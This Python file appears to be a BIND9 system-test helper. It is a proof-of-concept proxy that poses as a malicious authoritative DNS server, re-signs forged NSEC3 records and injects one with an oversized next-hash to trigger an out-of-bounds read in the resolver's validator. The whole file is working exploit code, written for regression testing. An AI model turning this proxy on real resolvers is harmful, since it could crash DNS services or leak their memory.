Home | History | Annotate | Line # | Download | only in ans7
      1 #!/usr/bin/env python3
      2 # Copyright (C) Internet Systems Consortium, Inc. ("ISC")
      3 #
      4 # SPDX-License-Identifier: MPL-2.0
      5 #
      6 # This Source Code Form is subject to the terms of the Mozilla Public
      7 # License, v. 2.0.  If a copy of the MPL was not distributed with this
      8 # file, you can obtain one at https://mozilla.org/MPL/2.0/.
      9 #
     10 # See the COPYRIGHT file distributed with this work for additional
     11 # information regarding copyright ownership.
     12 
     13 """
     14 Crafted authoritative DNS proxy for BIND9 NSEC3 OOB read PoC.
     15 
     16 Simulates a malicious authoritative server that crafts NSEC3 responses
     17 to trigger CWE-125 (out-of-bounds stack read) in validator.c:344.
     18 
     19 Attack chain:
     20 1. Resolver queries xxx.evil.test A -> proxy modifies NSEC3 in A response
     21    (breaks the NSEC3 proof, forcing proveunsecure() fallback)
     22 2. Resolver fetches DS for xxx.evil.test -> proxy injects crafted NSEC3
     23    with next_length=200 (exceeds 155-byte buffer) at position 0
     24 3. DS validation succeeds via unmodified NSEC3 (opt-out coverage)
     25 4. ncache stores: [crafted_nsec3 (200B next), original_nsec3]
     26 5. isdelegation() iterates ncache -> crafted first -> memcmp() OOB read
     27 
     28 Usage: python3 crafted_auth_v6.py <ip> <port>
     29        Listens on [ip]:[port]
     30        Forwards to legitimate auth server on [10.53.0.6]:[port]
     31 
     32 Prerequisites: pip install dnspython cryptography
     33 """
     34 
     35 import base64
     36 import glob
     37 import os
     38 import signal
     39 import socket
     40 import struct
     41 import sys
     42 import time
     43 
     44 from cryptography.hazmat.backends import default_backend
     45 from cryptography.hazmat.primitives import hashes
     46 from cryptography.hazmat.primitives.asymmetric import ec, utils
     47 
     48 import dns.message
     49 import dns.name
     50 import dns.rcode
     51 import dns.rdata
     52 import dns.rdataclass
     53 import dns.rdatatype
     54 import dns.rrset
     55 
     56 IP = sys.argv[1]
     57 PORT = int(sys.argv[2])
     58 TARGET_NEXT_LENGTH = 200
     59 ZONE_FILE = "../ns6/evil.test.db.signed"
     60 
     61 # NSEC3 params: alg=1(SHA1), flags=1(opt-out), iterations=10, salt=DEADBEEF
     62 NSEC3_ALG = 1
     63 NSEC3_FLAGS = 1
     64 NSEC3_ITERATIONS = 10
     65 NSEC3_SALT = bytes.fromhex("DEADBEEF")
     66 NSEC3_TTL = 86400
     67 
     68 # RRSIG timing: computed dynamically for portability
     69 NOW = int(time.time())
     70 RRSIG_LABELS = 3
     71 RRSIG_ORIG_TTL = 86400
     72 RRSIG_INCEPTION = NOW - 3600  # 1 hour ago
     73 RRSIG_EXPIRATION = NOW + 30 * 86400  # 30 days from now
     74 
     75 
     76 def discover_nsec3_from_zone(zone_file):
     77     """
     78     Auto-discover NSEC3 owner names and next hashes from the signed zone.
     79     Returns list of dicts sorted by owner name.
     80     """
     81     nsec3_records = []
     82     with open(zone_file, "r", encoding="utf-8") as f:
     83         for line in f:
     84             line = line.strip()
     85             if not line or line.startswith(";"):
     86                 continue
     87             parts = line.split()
     88             if parts[3] == "NSEC3":
     89                 print(parts)
     90                 try:
     91                     idx = parts.index("NSEC3")
     92                     print(idx)
     93                     owner = parts[0]
     94                     next_hash_b32 = parts[idx + 5]
     95                     flags = int(parts[idx + 2])
     96                     nsec3_records.append(
     97                         {
     98                             "owner": owner,
     99                             "next_hash_b32": next_hash_b32,
    100                             "flags": flags,
    101                         }
    102                     )
    103                 except (IndexError, ValueError):
    104                     continue
    105     nsec3_records.sort(key=lambda r: r["owner"])
    106     return nsec3_records
    107 
    108 
    109 def b32_to_bytes(b32hex_str):
    110     """Decode base32hex (RFC 4648) to bytes."""
    111     padded = b32hex_str.upper() + "=" * ((8 - len(b32hex_str) % 8) % 8)
    112     return base64.b32hexdecode(padded)
    113 
    114 
    115 def load_zsk():
    116     """Load the Zone Signing Key (ZSK) for re-signing modified records."""
    117     keys = glob.glob("../ns6/Kevil.test.+013+*.private")
    118     for kf in keys:
    119         pub = kf.replace(".private", ".key")
    120         with open(pub, "r", encoding="utf-8") as f:
    121             content = f.read()
    122         if "256 3 13" in content:
    123             with open(kf, "r", encoding="utf-8") as pf:
    124                 for line in pf:
    125                     if line.startswith("PrivateKey:"):
    126                         key_bytes = base64.b64decode(line.split(":", 1)[1].strip())
    127                         pk = ec.derive_private_key(
    128                             int.from_bytes(key_bytes, "big"),
    129                             ec.SECP256R1(),
    130                             default_backend(),
    131                         )
    132                         tag = int(kf.split("+")[-1].replace(".private", ""))
    133                         print(f"[*] Loaded ZSK key tag={tag}", flush=True)
    134                         return pk, tag
    135     raise ValueError("No ZSK found")
    136 
    137 
    138 def sign_rrset(
    139     private_key,
    140     key_tag,
    141     rrset,
    142     type_covered,
    143     labels,
    144     original_ttl,
    145     expiration,
    146     inception,
    147     signer_name,
    148 ):
    149     """Sign an RRset with ECDSAP256SHA256 and return RRSIG rdata."""
    150     algorithm = 13
    151 
    152     sig_rdata = struct.pack("!HBBI", type_covered, algorithm, labels, original_ttl)
    153     sig_rdata += struct.pack("!II", expiration, inception)
    154     sig_rdata += struct.pack("!H", key_tag)
    155     sig_rdata += signer_name.canonicalize().to_wire()
    156 
    157     rr_wires = []
    158     for rdata in rrset:
    159         rdata_wire = rdata.to_digestable()
    160         rr_wire = rrset.name.canonicalize().to_wire()
    161         rr_wire += struct.pack("!HHI", rrset.rdtype, rrset.rdclass, original_ttl)
    162         rr_wire += struct.pack("!H", len(rdata_wire))
    163         rr_wire += rdata_wire
    164         rr_wires.append(rr_wire)
    165 
    166     rr_wires.sort()
    167     sign_data = sig_rdata + b"".join(rr_wires)
    168 
    169     der_sig = private_key.sign(sign_data, ec.ECDSA(hashes.SHA256()))
    170     r, s = utils.decode_dss_signature(der_sig)
    171     raw_sig = r.to_bytes(32, "big") + s.to_bytes(32, "big")
    172 
    173     full_rrsig_wire = sig_rdata + raw_sig
    174     rrsig_rdata = dns.rdata.from_wire(
    175         dns.rdataclass.IN,
    176         dns.rdatatype.RRSIG,
    177         full_rrsig_wire,
    178         0,
    179         len(full_rrsig_wire),
    180         None,
    181     )
    182     return rrsig_rdata
    183 
    184 
    185 def sign_rrset_from_template(private_key, key_tag, rrset, template_rrsig):
    186     """Sign using existing RRSIG as template for type_covered."""
    187     return sign_rrset(
    188         private_key,
    189         key_tag,
    190         rrset,
    191         template_rrsig.type_covered,
    192         RRSIG_LABELS,
    193         RRSIG_ORIG_TTL,
    194         RRSIG_EXPIRATION,
    195         RRSIG_INCEPTION,
    196         template_rrsig.signer,
    197     )
    198 
    199 
    200 def build_crafted_nsec3(private_key, key_tag, owner_name, original_next_hash, bitmaps):
    201     """
    202     Build a crafted NSEC3 with next_length=200 (exceeds 155-byte buffer).
    203     Returns (nsec3_rrset, rrsig_rrset).
    204     """
    205     name = dns.name.from_text(owner_name)
    206     signer = dns.name.from_text("evil.test.")
    207 
    208     crafted_next = original_next_hash + os.urandom(
    209         TARGET_NEXT_LENGTH - len(original_next_hash)
    210     )
    211 
    212     nsec3_wire = struct.pack("!BBH", NSEC3_ALG, NSEC3_FLAGS, NSEC3_ITERATIONS)
    213     nsec3_wire += struct.pack("!B", len(NSEC3_SALT)) + NSEC3_SALT
    214     nsec3_wire += struct.pack("!B", TARGET_NEXT_LENGTH) + crafted_next
    215     nsec3_wire += bitmaps
    216 
    217     nsec3_rdata = dns.rdata.from_wire(
    218         dns.rdataclass.IN, dns.rdatatype.NSEC3, nsec3_wire, 0, len(nsec3_wire), None
    219     )
    220 
    221     nsec3_rrset = dns.rrset.RRset(name, dns.rdataclass.IN, dns.rdatatype.NSEC3)
    222     nsec3_rrset.update_ttl(NSEC3_TTL)
    223     nsec3_rrset.add(nsec3_rdata)
    224 
    225     rrsig_rdata = sign_rrset(
    226         private_key,
    227         key_tag,
    228         nsec3_rrset,
    229         type_covered=dns.rdatatype.NSEC3,
    230         labels=RRSIG_LABELS,
    231         original_ttl=RRSIG_ORIG_TTL,
    232         expiration=RRSIG_EXPIRATION,
    233         inception=RRSIG_INCEPTION,
    234         signer_name=signer,
    235     )
    236 
    237     rrsig_rrset = dns.rrset.RRset(name, dns.rdataclass.IN, dns.rdatatype.RRSIG)
    238     rrsig_rrset.update_ttl(NSEC3_TTL)
    239     rrsig_rrset.add(rrsig_rdata)
    240 
    241     print(
    242         f"[*] Built crafted NSEC3: owner={owner_name}, "
    243         f"next_hash={TARGET_NEXT_LENGTH}B, signed tag={key_tag}",
    244         flush=True,
    245     )
    246     return nsec3_rrset, rrsig_rrset
    247 
    248 
    249 def modify_nsec3_next(rdata):
    250     """Modify an NSEC3 record's next_hash to TARGET_NEXT_LENGTH bytes."""
    251     orig_wire = rdata.to_digestable()
    252     pos = 0
    253     hash_alg = orig_wire[pos]
    254     pos += 1
    255     flags = orig_wire[pos]
    256     pos += 1
    257     iterations = struct.unpack("!H", orig_wire[pos : pos + 2])[0]
    258     pos += 2
    259     salt_len = orig_wire[pos]
    260     pos += 1
    261     salt = orig_wire[pos : pos + salt_len]
    262     pos += salt_len
    263     hash_len = orig_wire[pos]
    264     pos += 1
    265     next_hash = orig_wire[pos : pos + hash_len]
    266     pos += hash_len
    267     type_bitmaps = orig_wire[pos:]
    268 
    269     crafted_next = next_hash + os.urandom(TARGET_NEXT_LENGTH - len(next_hash))
    270     new_wire = struct.pack("!BBH", hash_alg, flags, iterations)
    271     new_wire += struct.pack("!B", salt_len) + salt
    272     new_wire += struct.pack("!B", TARGET_NEXT_LENGTH) + crafted_next
    273     new_wire += type_bitmaps
    274 
    275     return dns.rdata.from_wire(
    276         dns.rdataclass.IN, dns.rdatatype.NSEC3, new_wire, 0, len(new_wire), None
    277     )
    278 
    279 
    280 def name_label(name):
    281     """Get the first label (NSEC3 hash) from a DNS name."""
    282     return str(name).split(".", maxsplit=1)[0].upper()
    283 
    284 
    285 def is_target(dns_name, target_prefix):
    286     """Check if a DNS name's first label starts with target prefix."""
    287     return (
    288         str(dns_name)
    289         .split(".", maxsplit=1)[0]
    290         .upper()
    291         .startswith(target_prefix.upper())
    292     )
    293 
    294 
    295 def patch_a_response(response_data, private_key, key_tag, modify_name):
    296     """
    297     Patch A response: modify the NSEC3 matching modify_name to break
    298     the NSEC3 proof, forcing the resolver into proveunsecure().
    299     """
    300     try:
    301         msg = dns.message.from_wire(response_data)
    302     except Exception as e:  # pylint: disable=broad-except
    303         print(f"[!] Parse error: {e}", flush=True)
    304         return response_data
    305 
    306     new_authority = []
    307     for rrset in msg.authority:
    308         if rrset.rdtype == dns.rdatatype.NSEC3 and is_target(rrset.name, modify_name):
    309             new_rrset = dns.rrset.RRset(rrset.name, rrset.rdclass, rrset.rdtype)
    310             new_rrset.update_ttl(rrset.ttl)
    311             for rdata in rrset:
    312                 new_rrset.add(modify_nsec3_next(rdata))
    313             new_authority.append(new_rrset)
    314             print(
    315                 f"[!] PATCHED {name_label(rrset.name)}: "
    316                 f"next_hash -> {TARGET_NEXT_LENGTH}B",
    317                 flush=True,
    318             )
    319 
    320         elif rrset.rdtype == dns.rdatatype.RRSIG:
    321             covers_nsec3 = any(rd.type_covered == dns.rdatatype.NSEC3 for rd in rrset)
    322             if covers_nsec3 and is_target(rrset.name, modify_name):
    323                 target_rrset = [
    324                     rs
    325                     for rs in new_authority
    326                     if rs.rdtype == dns.rdatatype.NSEC3
    327                     and is_target(rs.name, modify_name)
    328                 ]
    329                 if target_rrset:
    330                     template = next(iter(rrset))
    331                     try:
    332                         new_rrsig = sign_rrset_from_template(
    333                             private_key, key_tag, target_rrset[0], template
    334                         )
    335                         rrsig_rrset = dns.rrset.RRset(
    336                             rrset.name, dns.rdataclass.IN, dns.rdatatype.RRSIG
    337                         )
    338                         rrsig_rrset.update_ttl(rrset.ttl)
    339                         rrsig_rrset.add(new_rrsig)
    340                         new_authority.append(rrsig_rrset)
    341                         print(f"[!] Re-signed " f"{name_label(rrset.name)}", flush=True)
    342                     except Exception as e:  # pylint: disable=broad-except
    343                         print(f"[!] Sign error: {e}", flush=True)
    344                         new_authority.append(rrset)
    345                 else:
    346                     new_authority.append(rrset)
    347             else:
    348                 new_authority.append(rrset)
    349         else:
    350             new_authority.append(rrset)
    351 
    352     msg.authority = new_authority
    353     try:
    354         wire = msg.to_wire()
    355         print(f"[!] A response: {len(wire)} bytes", flush=True)
    356         return wire
    357     except Exception as e:  # pylint: disable=broad-except
    358         print(f"[!] Wire error: {e}", flush=True)
    359         return response_data
    360 
    361 
    362 def patch_ds_response(response_data, crafted_nsec3, crafted_rrsig, inject_name):
    363     """
    364     Patch DS response:
    365     - Change RCODE NXDOMAIN -> NOERROR
    366     - Inject crafted NSEC3 (200B next) at position 0 in authority
    367     """
    368     try:
    369         msg = dns.message.from_wire(response_data)
    370     except Exception as e:  # pylint: disable=broad-except
    371         print(f"[!] Parse error: {e}", flush=True)
    372         return response_data
    373 
    374     if msg.rcode() == dns.rcode.NXDOMAIN:
    375         msg.set_rcode(dns.rcode.NOERROR)
    376         print("[!] RCODE: NXDOMAIN -> NOERROR", flush=True)
    377 
    378     new_authority = [crafted_nsec3, crafted_rrsig]
    379     print(
    380         "[!] INJECTED crafted "
    381         f"{name_label(crafted_nsec3.name)} "
    382         f"(next={TARGET_NEXT_LENGTH}B) at position 0",
    383         flush=True,
    384     )
    385 
    386     for rrset in msg.authority:
    387         if is_target(rrset.name, inject_name):
    388             print(f"[D] Skipped original " f"{name_label(rrset.name)}", flush=True)
    389             continue
    390         new_authority.append(rrset)
    391 
    392     msg.authority = new_authority
    393     try:
    394         wire = msg.to_wire()
    395         print(f"[!] DS response: {len(wire)} bytes", flush=True)
    396         return wire
    397     except Exception as e:  # pylint: disable=broad-except
    398         print(f"[!] Wire error: {e}", flush=True)
    399         return response_data
    400 
    401 
    402 def sigterm(*_):
    403     print("SIGTERM received, shutting down")
    404     os.remove("ans.pid")
    405     sys.exit(0)
    406 
    407 
    408 def main():
    409     signal.signal(signal.SIGTERM, sigterm)
    410     signal.signal(signal.SIGINT, sigterm)
    411     with open("ans.pid", "w", encoding="utf-8") as pidfile:
    412         print(os.getpid(), file=pidfile)
    413 
    414     # Auto-discover NSEC3 info from signed zone
    415     print(f"[*] Reading zone file: {ZONE_FILE}", flush=True)
    416     nsec3_records = discover_nsec3_from_zone(ZONE_FILE)
    417 
    418     if len(nsec3_records) < 2:
    419         print(
    420             f"[!] ERROR: Need >= 2 NSEC3 records, " f"found {len(nsec3_records)}",
    421             flush=True,
    422         )
    423         sys.exit(1)
    424 
    425     # First alphabetically = inject target, second = modify target
    426     inject_rec = nsec3_records[0]
    427     modify_rec = nsec3_records[1]
    428 
    429     inject_name = inject_rec["owner"].split(".")[0]
    430     modify_name = modify_rec["owner"].split(".")[0]
    431     inject_owner_full = inject_rec["owner"]
    432     inject_next_hash = b32_to_bytes(inject_rec["next_hash_b32"])
    433 
    434     inject_bitmaps = bytes.fromhex("0006400000000002")  # A RRSIG
    435 
    436     print(f"[*] NSEC3 to INJECT (crafted): {inject_name}", flush=True)
    437     print(f"[*] NSEC3 to MODIFY (break proof): {modify_name}", flush=True)
    438 
    439     # Load ZSK for re-signing
    440     private_key, key_tag = load_zsk()
    441 
    442     # Build crafted NSEC3 with next_length=200
    443     crafted_nsec3, crafted_rrsig = build_crafted_nsec3(
    444         private_key, key_tag, inject_owner_full, inject_next_hash, inject_bitmaps
    445     )
    446 
    447     # Start UDP proxy
    448     sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    449     sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    450     sock.bind((IP, PORT))
    451     print(f"[*] Proxy on {IP}:{PORT} -> {IP}:{PORT}", flush=True)
    452 
    453     while True:
    454         data, addr = sock.recvfrom(4096)
    455         try:
    456             query = dns.message.from_wire(data)
    457             qname = query.question[0].name
    458             qtype = query.question[0].rdtype
    459             qtype_text = dns.rdatatype.to_text(qtype)
    460             print(f"\n[<] Query from {addr}: {qname} {qtype_text}", flush=True)
    461         except Exception as e:  # pylint: disable=broad-except
    462             print(f"[<] Query parse error: {e}", flush=True)
    463             qtype = None
    464 
    465         fwd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    466         fwd.settimeout(3)
    467         fwd.sendto(data, ("10.53.0.6", PORT))
    468         try:
    469             response, _ = fwd.recvfrom(65535)
    470             if qtype == dns.rdatatype.DS:
    471                 print("[>] DS - inject crafted + RCODE change", flush=True)
    472                 modified = patch_ds_response(
    473                     response, crafted_nsec3, crafted_rrsig, inject_name
    474                 )
    475                 sock.sendto(modified, addr)
    476             elif qtype in (dns.rdatatype.A, dns.rdatatype.AAAA):
    477                 print(f"[>] A - modify {modify_name}", flush=True)
    478                 modified = patch_a_response(response, private_key, key_tag, modify_name)
    479                 sock.sendto(modified, addr)
    480             else:
    481                 print(f"[>] {qtype_text} - forwarding", flush=True)
    482                 sock.sendto(response, addr)
    483         except Exception as e:  # pylint: disable=broad-except
    484             print(f"[!] Error: {e}", flush=True)
    485         finally:
    486             fwd.close()
    487 
    488 
    489 if __name__ == "__main__":
    490     main()
    491